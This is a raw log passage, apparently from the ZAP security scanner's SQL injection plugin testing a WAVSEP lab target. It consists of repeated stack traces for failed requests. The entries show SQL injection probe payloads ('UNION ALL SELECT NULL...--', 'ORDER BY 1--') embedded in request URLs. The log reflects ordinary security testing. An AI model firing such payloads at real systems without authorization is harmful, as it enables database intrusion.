NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680332 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680334 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680335 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680336 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680337 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 9827-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 9827-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680338 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680340 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680341 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680343 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680344 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680345 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680346 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680347 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error 